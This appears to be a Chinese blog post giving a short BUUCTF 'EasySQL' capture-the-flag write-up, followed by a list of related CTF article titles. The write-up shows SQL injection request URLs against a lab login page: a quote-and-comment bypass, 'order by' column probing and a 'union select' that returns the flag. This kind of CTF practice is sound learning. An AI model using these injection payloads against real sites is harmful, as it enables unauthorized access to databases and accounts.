每天一道CTF

思路:


点击“登陆”:

利用 hackbar load:
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ – -&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 1 – -&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 3 – -&password=1

http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ order by 4 – -&password=1

验证有4列。
然后常规思路:union select: 居然就有flag了:
http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ union select 1,2,3 – -&password=1

flag{2c4ccab2-f25f-4dd4-b513-e32bee83c8f8}

每天一道CTF---BUUCTF---练习场----EasySQL1---相关推荐

  1. ctf xor题_从一道CTF题目谈PHP中的命令执行

    原创 Xenny 合天智汇 快睡的时候,打开B站发现有位用户留言,大意就是让我帮忙看一道题,正好当时有空,于是就打开了他发的链接,代码如下 很明显是一道PHP代码审计的题目,而且只需要绕过第三行的if ...

  2. 安卓逆向从入门到嗝屁之另一道CTF题目

    小伙伴发了一道安卓的CTF题目,有空就看了下: 首先,这次就先不装了,开个模拟器卡的一P,androidkiller.gda等无法打开,jeb正常打开(当然dex2jar打开dex文件,再用jd-gu ...

  3. 【偶尔一道ctf】xctf adword mobile easy-apk

    最近在学习ctf,偶尔会做一些ctf题,打算记录下做题的步骤和思路,打算学习ctf的小白可以跟着一起动手学习.本题是安卓题目. 题目apk下载地址 https://adworld.xctf.org.c ...

  4. ctf 监听端口_从一道ctf题目学到的绕过长度执行命令姿势 - 华域联盟|chu

    参考:https://blog.csdn.net/calmegm/article/details/80874902 https://www.leavesongs.com/SHARE/some-tric ...

  5. ctf赛题上传一个php木马,从一道CTF题学习PHP反序列化漏洞

    一.CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下. 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入 ...

  6. 记一次php、sql注入学习后的一道ctf代码审计题复盘

    之前在学校的时候参加了ctf比赛,有幸拿了一个代码审计题的一血,但是当时可能也是算运气比较好吧,因为我的思路并不是常规解法,但还是拿了一血,现在更深入的学习php和sql注入之后,反过来看这道代码审计 ...

  7. 从一道CTF题目学习Tanner图和LDPC

    概述   Tanner图是由Mr Tanner在1981在论文中提出来的,是研究低密度校验码的重要工具.   Tanner图表示的是 LDPC 的校验矩阵.Tanner图中的循环是由图中的一群相互连接 ...

  8. 一道ctf题关于php反序列化字符逃逸

    0x01 前言 无意间做应该是0ctf2016的一道web题,get新点,总计一下. 0x02 代码审计 进去之后是一个登录界面,试了一下register.php发现可以注册,注册完成后登录跳转到up ...

  9. cmd执行命令不等待返回值_从一道ctf题目学到的绕过长度执行命令姿势

    0x01:linux中的 > 符号和 >> 符号 1.通过>来创建文件 >test.txtls 2.通过>将命令执行的结果存入文件中 echo "hell ...

  10. 一道ctf流量分析题

    此ctf用到wireshark软件,Wireshark可以帮助解决一些问题比如:丢包.延迟.DDoS攻击.它可以将网络流量展现,并可以通过软件内部的工具对流量进行分析,从而找出问题所在,并解决问题. ...

最新文章

  1. Redis 存储字符串和对象
  2. Python 脚本错误:IndentationError: unindent does not match any outer indentation level
  3. android控件之间的过渡动画效果,Android - 交换控件位置:基于LayoutParams的瞬间交换与基于ObjectAnimator动画效果交换...
  4. (二)Flask 学习 —— 模板
  5. 参观 Facebook 是一种什么体验?
  6. 字符串中索引位置是什么意思_女孩子左手中指戴戒指什么意思 不同位置各有不同...
  7. 如何在整个目录上运行dos2unix?
  8. SIGKDD2021 | 淘宝搜索向量化召回实践
  9. TOPOLOGY ADAPTIVE GRAPH CONVOLUTIONAL NETWORKS论文笔记(TAGConv)
  10. 项目计划书——书写模板
  11. 网站目标定位的关键词和选择质量高的关键词
  12. 物联网智能产品WiFi/蓝牙定位原理
  13. 使用JS将table表格导出为excel
  14. Modesim仿真出现vlog-2388问题
  15. jQuery—弹窗广告
  16. 【K-S检验】检验两个数据集的分布是否一致
  17. Onestage Grounding
  18. 嵌入式必看!全志T113-i+玄铁HiFi4核心板硬件说明资料分享
  19. 主DNS、辅助DNS、缓存DNS和基于CDN的利用DNS服务器实现负载均衡
  20. 理财-股票(扫文章中的二维码下软件)

热门文章

  1. Regarding empty field check in business document save
  2. 如何解决AET field创建失败后的一系列dump
  3. SAP Fiori应用里Cross Application跳转的一些常见错误
  4. java ibatis 获取执行的sql_小程序官宣+JAVA 三大框架基础面试题
  5. 动态分区分配的“首次适应算法_kafka集群关于资源分配的手册
  6. densenet论文_DRCN论文解读
  7. 数据科学项目(二)之明确问题及确立目标
  8. Kittle工具抽取文件出现乱码的情况解决方法
  9. 附件中可能包含对计算机有害的病毒.附件可能无法正确显示,广西成人高校计算机实用基础统考理论试题(A卷)...
  10. 人才管理是什么意思_cms系统是什么意思,国内常用的cms内容管理系统有哪些